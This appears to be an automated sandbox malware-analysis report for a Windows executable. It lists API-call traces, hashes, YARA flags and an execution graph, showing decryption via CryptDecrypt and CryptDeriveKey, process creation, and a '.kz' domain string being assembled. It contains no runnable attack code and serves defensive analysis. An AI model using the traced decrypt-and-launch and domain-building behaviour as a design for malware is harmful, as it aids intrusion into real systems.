                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EwK95WVtzI.exe,00000104), ref: 0050BB64
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050BC2F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050BC39
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1797909105
                                                                                                                                                                                                                                                          • Opcode ID: 3963713b62bdde96ec418e730be2426372b353a811a3f32881f3937beac461bb
                                                                                                                                                                                                                                                          • Instruction ID: a7be04ed5e00156eb06afd48d2622a5a666011db3caa170ea0e5c5edf44aa729
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3963713b62bdde96ec418e730be2426372b353a811a3f32881f3937beac461bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79318075A04209AFEB21DF999C899AEBFFCFB95310B104066E904A7291DB708E44DB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: @vT$vT
                                                                                                                                                                                                                                                          • API String ID: 269201875-779300134
                                                                                                                                                                                                                                                          • Opcode ID: f9a28707c2eb178972586bb0712ee79039cbb0f96adcfbe558e3dcca9bc4f636
                                                                                                                                                                                                                                                          • Instruction ID: 20d504ace9e3e26ee23d9cc2437763b3cc8386db7bb0416865fb658b375d114c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9a28707c2eb178972586bb0712ee79039cbb0f96adcfbe558e3dcca9bc4f636
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44112975A0470546DB205F6CAC05BED3BA47765724F141B16FA24CB2E0D7B0D84667A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0050B4A4
                                                                                                                                                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0050B4A9
                                                                                                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0050B4AE
                                                                                                                                                                                                                                                            • Part of subcall function 0050B6B8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0050B6C9
                                                                                                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0050B4C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1761009282-0
                                                                                                                                                                                                                                                          • Opcode ID: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                                                                                          • Instruction ID: 0a05c7c9f610e97781871ecf5a9c1201319ba0fa29ce83d1694458288fcebc1c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C04C1400120310FC6036F112CBAAD0F223FF2BC579018C1AE81176C74F0B090A5273
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 013F9308
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8BFF
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: GetLastError.KERNEL32 ref: 013F8C09
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8C38
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F8C59
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 013F8C71
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 013F8C99
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 013F8CC1
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 013F8CD5
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8CE1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 013F93DB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                          • Opcode ID: e7535fc87202f24d83fbd9b32b8091f7d3a37a84bb2ee4bf24e04bb7f21afad9
                                                                                                                                                                                                                                                          • Instruction ID: 718d3c483e345d8a9439b61fb49eb34a9de16d76e5cd65abc4e241659d1cf88e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7535fc87202f24d83fbd9b32b8091f7d3a37a84bb2ee4bf24e04bb7f21afad9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31E1B1D0020DEBDF18DF98D885BEEB7B9EF58308F14815DE615A7280E7389A85CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,0050178F,?,?,?,?,?,?,?,?,?,?,00546E78), ref: 0051164A
                                                                                                                                                                                                                                                          • SetHandleInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2), ref: 00511667
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorHandleInformationLast
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 1721798545-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 43e73aef6666b1a840845a5fde02389c0953e3b3c2f65769d2f820069fb43fb7
                                                                                                                                                                                                                                                          • Instruction ID: 0c95d9a64fb0fa46cf90e117dd07b3f83ad8cc8f5e75b71ea1ce97d4be7a8308
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43e73aef6666b1a840845a5fde02389c0953e3b3c2f65769d2f820069fb43fb7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2131E435600602CFD308CF28E884AD6B7F5FB95358F0946A9E1598B2A1D731ED89DF46
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00504E38,?,?,?,?,?,?,00546E78,?,?,?,?,00546E78), ref: 00510476
                                                                                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00510489
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$ProcessWalk
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 3245327933-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 84973d7a9a947329f9d1b15bb55c414bf79bd51803f7dcd11189f02429e66a30
                                                                                                                                                                                                                                                          • Instruction ID: d1e0f8b8c5ad18e9336fad51e45bedd4bdd5c6e90bb6c0a6fa9978e96250f4d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84973d7a9a947329f9d1b15bb55c414bf79bd51803f7dcd11189f02429e66a30
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221D5366002118FEB04CB28D9C4ADA77EAFB89319F15463AD50187291D7F4ECD9DB82
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0050A63F
                                                                                                                                                                                                                                                          • ___raise_securityfailure.LIBCMT ref: 0050A726
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                          • String ID: (zT
                                                                                                                                                                                                                                                          • API String ID: 3761405300-1892272859
                                                                                                                                                                                                                                                          • Opcode ID: 534422a3b656b311667dbfa126b0b59e54865aa39e3d504fb0462eb3489a1472
                                                                                                                                                                                                                                                          • Instruction ID: 7077c43dcc31a8309c055451e3d824ebdc0ddaa857d96abdea5bf3fa34499146
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 534422a3b656b311667dbfa126b0b59e54865aa39e3d504fb0462eb3489a1472
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E42125BC5193089BD305CF15FC95A947BB4FB2E318F10446AE9048B7A0E7B15A88EF85
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                          • Opcode ID: fc4a14dcc31ba7cf4b0ed3c8201915f4ca3fcd8cd0bb7a1b0e68e324b5fb6469
                                                                                                                                                                                                                                                          • Instruction ID: c8db04083a5ae6eb8a787f055f46ca336e829bdac3da0c6c5c0b92b2473c0661
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc4a14dcc31ba7cf4b0ed3c8201915f4ca3fcd8cd0bb7a1b0e68e324b5fb6469
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F116D7190420DEBDB14CF98C995BEEBBB8EB50308F04C28DEA15AB381D375E655CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 013F1EB4
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F1EC2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                          • Opcode ID: bbd0e59e5a542d19c971a6f92e675ec5dc75e63886e416ff2c3427afc66f827f
                                                                                                                                                                                                                                                          • Instruction ID: 62315a5c61982625f66cfbbc8500c4c5417d7f8530d1a81824f78dea85a4fe59
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbd0e59e5a542d19c971a6f92e675ec5dc75e63886e416ff2c3427afc66f827f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A011DB5A4020DABEB10DF94DD49FEE77B9AB14704F14411CFB08AB2C0E7749A04DBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:13.5%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.9%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:1950
                                                                                                                                                                                                                                                          Total number of Limit Nodes:91
                                                                                                                                                                                                                                                          execution_graph 12976 569f53 12977 569f5b pre_c_initialization 12976->12977 12994 56c0a3 12977->12994 12979 569f66 pre_c_initialization 12999 56a8b6 12979->12999 12981 569fef 12982 56a338 ___scrt_fastfail 4 API calls 12981->12982 12984 569ff6 ___scrt_initialize_default_local_stdio_options 12982->12984 12983 569f7b __RTC_Initialize 12983->12981 13004 56aa57 12983->13004 12986 569f94 pre_c_initialization 12986->12981 12987 569fa5 12986->12987 13007 56ab15 InitializeSListHead 12987->13007 12989 569faa pre_c_initialization __except_handler4 13008 56ab21 12989->13008 12991 569fcd pre_c_initialization 13014 5696c3 12991->13014 12993 569fd8 pre_c_initialization 12995 56c0d5 12994->12995 12996 56c0b2 12994->12996 12995->12979 12996->12995 12997 5662bc _free 20 API calls 12996->12997 12998 56c0c5 _abort 12997->12998 12998->12979 13000 56a8c4 12999->13000 13003 56a8c9 ___scrt_initialize_onexit_tables 12999->13003 13001 56a338 ___scrt_fastfail 4 API calls 13000->13001 13000->13003 13002 56a94c 13001->13002 13003->12983 13019 56aa1c 13004->13019 13007->12989 13057 56c22f 13008->13057 13010 56ab32 13011 56ab39 13010->13011 13012 56a338 ___scrt_fastfail 4 API calls 13010->13012 13011->12991 13013 56ab41 13012->13013 13015 5669e4 _abort 35 API calls 13014->13015 13016 5696ce 13015->13016 13017 5662bc _free 20 API calls 13016->13017 13018 5696fb _abort 13016->13018 13017->13018 13018->12993 13020 56aa40 13019->13020 13021 56aa39 13019->13021 13028 569c09 13020->13028 13025 569b99 13021->13025 13024 56aa3e 13024->12986 13026 569c09 __onexit 23 API calls 13025->13026 13027 569bab 13026->13027 13027->13024 13031 569910 13028->13031 13034 569846 13031->13034 13033 569934 13033->13024 13035 569852 ___scrt_is_nonwritable_in_current_image 13034->13035 13042 567c63 EnterCriticalSection 13035->13042 13037 569860 13043 569a58 13037->13043 13039 56986d 13053 56988b 13039->13053 13041 56987e ___scrt_is_nonwritable_in_current_image 13041->13033 13042->13037 13044 569a6e try_get_function 13043->13044 13045 569a76 13043->13045 13044->13039 13045->13044 13046 569e06 __onexit 23 API calls 13045->13046 13052 569acf 13045->13052 13048 569ac5 13046->13048 13047 569e06 __onexit 23 API calls 13049 569ae5 13047->13049 13050 5673bc _free 20 API calls 13048->13050 13051 5673bc _free 20 API calls 13049->13051 13050->13052 13051->13044 13052->13044 13052->13047 13056 567cab LeaveCriticalSection 13053->13056 13055 569895 13055->13041 13056->13055 13059 56c24d pre_c_initialization 13057->13059 13060 56c263 pre_c_initialization _abort 13057->13060 13058 5662bc _free 20 API calls 13058->13060 13059->13058 13060->13010 12653 5668cf 12654 5668ea 12653->12654 12655 5668da 12653->12655 12659 5668f0 12655->12659 12658 5673bc _free 20 API calls 12658->12654 12660 566903 12659->12660 12661 566909 12659->12661 12662 5673bc _free 20 API calls 12660->12662 12663 5673bc _free 20 API calls 12661->12663 12662->12661 12664 566915 12663->12664 12665 5673bc _free 20 API calls 12664->12665 12666 566920 12665->12666 12667 5673bc _free 20 API calls 12666->12667 12668 56692b 12667->12668 12669 5673bc _free 20 API calls 12668->12669 12670 566936 12669->12670 12671 5673bc _free 20 API calls 12670->12671 12672 566941 12671->12672 12673 5673bc _free 20 API calls 12672->12673 12674 56694c 12673->12674 12675 5673bc _free 20 API calls 12674->12675 12676 566957 12675->12676 12677 5673bc _free 20 API calls 12676->12677 12678 566962 12677->12678 12679 5673bc _free 20 API calls 12678->12679 12680 566970 12679->12680 12685 5667b6 12680->12685 12691 5666c2 12685->12691 12687 5667da 12688 566806 12687->12688 12704 566723 12688->12704 12690 56682a 12690->12658 12692 5666ce ___scrt_is_nonwritable_in_current_image 12691->12692 12699 567c63 EnterCriticalSection 12692->12699 12694 566702 12700 566717 12694->12700 12696 5666d8 12696->12694 12698 5673bc _free 20 API calls 12696->12698 12697 56670f ___scrt_is_nonwritable_in_current_image 12697->12687 12698->12694 12699->12696 12703 567cab LeaveCriticalSection 12700->12703 12702 566721 12702->12697 12703->12702 12705 56672f ___scrt_is_nonwritable_in_current_image 12704->12705 12712 567c63 EnterCriticalSection 12705->12712 12707 566739 12708 566999 _free 20 API calls 12707->12708 12709 56674c 12708->12709 12713 566762 12709->12713 12711 56675a ___scrt_is_nonwritable_in_current_image 12711->12690 12712->12707 12716 567cab LeaveCriticalSection 12713->12716 12715 56676c 12715->12711 12716->12715 12462 a14880 12465 a1488f 12462->12465 12463 a14a9f CryptReleaseContext 12464 a14aab 12463->12464 12465->12463 12466 a148be CryptCreateHash 12465->12466 12467 a14a90 12466->12467 12468 a148f9 CryptHashData 12466->12468 12467->12463 12469 a14a83 CryptDestroyHash 12468->12469 12470 a14919 CryptDeriveKey 12468->12470 12469->12467 12470->12469 12471 a1494a CryptDecrypt CryptDestroyKey 12470->12471 12471->12469 12472 a14995 CryptCreateHash 12471->12472 12472->12469 12473 a149b7 CryptHashData 12472->12473 12474 a14a76 CryptDestroyHash 12473->12474 12475 a149da CryptGetHashParam 12473->12475 12474->12469 12475->12474 12476 a14a11 CryptGetHashParam 12475->12476 12476->12474 12477 a14a3e 12476->12477 12477->12474 12478 569671 12479 56967d ___scrt_is_nonwritable_in_current_image 12478->12479 12480 5696b4 ___scrt_is_nonwritable_in_current_image 12479->12480 12486 567c63 EnterCriticalSection 12479->12486 12482 569691 12483 567bd2 __fassign 20 API calls 12482->12483 12484 5696a1 12483->12484 12487 5696ba 12484->12487 12486->12482 12490 567cab LeaveCriticalSection 12487->12490 12489 5696c1 12489->12480 12490->12489 12506 569264 12509 56821f 12506->12509 12510 568228 12509->12510 12512 568231 12509->12512 12511 56811e 49 API calls 12510->12511 12511->12512 13449 56d3e1 13459 56da23 13449->13459 13453 56d3ee 13472 56dba4 13453->13472 13456 56d418 13457 5673bc _free 20 API calls 13456->13457 13458 56d423 13457->13458 13476 56da2c 13459->13476 13461 56d3e9 13462 56db04 13461->13462 13463 56db10 ___scrt_is_nonwritable_in_current_image 13462->13463 13496 567c63 EnterCriticalSection 13463->13496 13465 56db86 13508 56db9b 13465->13508 13467 56db92 ___scrt_is_nonwritable_in_current_image 13467->13453 13468 56db5a DeleteCriticalSection 13470 5673bc _free 20 API calls 13468->13470 13471 56db1b 13470->13471 13471->13465 13471->13468 13497 56e91c 13471->13497 13473 56dbba 13472->13473 13475 56d3fd DeleteCriticalSection 13472->13475 13474 5673bc _free 20 API calls 13473->13474 13473->13475 13474->13475 13475->13453 13475->13456 13477 56da38 ___scrt_is_nonwritable_in_current_image 13476->13477 13486 567c63 EnterCriticalSection 13477->13486 13479 56dadb 13491 56dafb 13479->13491 13482 56dae7 ___scrt_is_nonwritable_in_current_image 13482->13461 13484 56d9dc 63 API calls 13485 56da47 13484->13485 13485->13479 13485->13484 13487 56d42d EnterCriticalSection 13485->13487 13488 56dad1 13485->13488 13486->13485 13487->13485 13494 56d441 LeaveCriticalSection 13488->13494 13490 56dad9 13490->13485 13495 567cab LeaveCriticalSection 13491->13495 13493 56db02 13493->13482 13494->13490 13495->13493 13496->13471 13498 56e928 ___scrt_is_nonwritable_in_current_image 13497->13498 13499 56e94e 13498->13499 13500 56e939 13498->13500 13505 56e93e ___scrt_is_nonwritable_in_current_image _abort 13499->13505 13511 56d42d EnterCriticalSection 13499->13511 13501 5662bc _free 20 API calls 13500->13501 13501->13505 13503 56e96a 13512 56e8a6 13503->13512 13505->13471 13506 56e975 13526 56e992 13506->13526 13760 567cab LeaveCriticalSection 13508->13760 13510 56dba2 13510->13467 13511->13503 13513 56e8b3 13512->13513 13514 56e8c8 13512->13514 13515 5662bc _free 20 API calls 13513->13515 13519 56e8b8 _abort 13514->13519 13529 56d976 13514->13529 13515->13519 13518 56dba4 20 API calls 13520 56e8e4 13518->13520 13519->13506 13535 56d2f3 13520->13535 13522 56e8ea 13540 56edaa 13522->13540 13524 56e8f0 13524->13519 13525 5673bc _free 20 API calls 13524->13525 13525->13519 13759 56d441 LeaveCriticalSection 13526->13759 13528 56e99a 13528->13505 13530 56d98e 13529->13530 13534 56d98a 13529->13534 13531 56d2f3 20 API calls 13530->13531 13530->13534 13532 56d9ae 13531->13532 13553 56e2a1 13532->13553 13534->13518 13536 56d314 13535->13536 13537 56d2ff 13535->13537 13536->13522 13538 5662bc _free 20 API calls 13537->13538 13539 56d304 _abort 13538->13539 13539->13522 13541 56edce 13540->13541 13542 56edb9 13540->13542 13544 56ee09 13541->13544 13548 56edf5 13541->13548 13543 5662a9 __dosmaperr 20 API calls 13542->13543 13545 56edbe 13543->13545 13546 5662a9 __dosmaperr 20 API calls 13544->13546 13547 5662bc _free 20 API calls 13545->13547 13549 56ee0e 13546->13549 13552 56edc6 _abort 13547->13552 13716 56ed82 13548->13716 13551 5662bc _free 20 API calls 13549->13551 13551->13552 13552->13524 13554 56e2ad ___scrt_is_nonwritable_in_current_image 13553->13554 13555 56e2b5 13554->13555 13556 56e2cd 13554->13556 13576 5662a9 13555->13576 13557 56e36b 13556->13557 13562 56e302 13556->13562 13559 5662a9 __dosmaperr 20 API calls 13557->13559 13563 56e370 13559->13563 13561 5662bc _free 20 API calls 13572 56e2c2 ___scrt_is_nonwritable_in_current_image _abort 13561->13572 13579 56c99a EnterCriticalSection 13562->13579 13565 5662bc _free 20 API calls 13563->13565 13565->13572 13566 56e308 13567 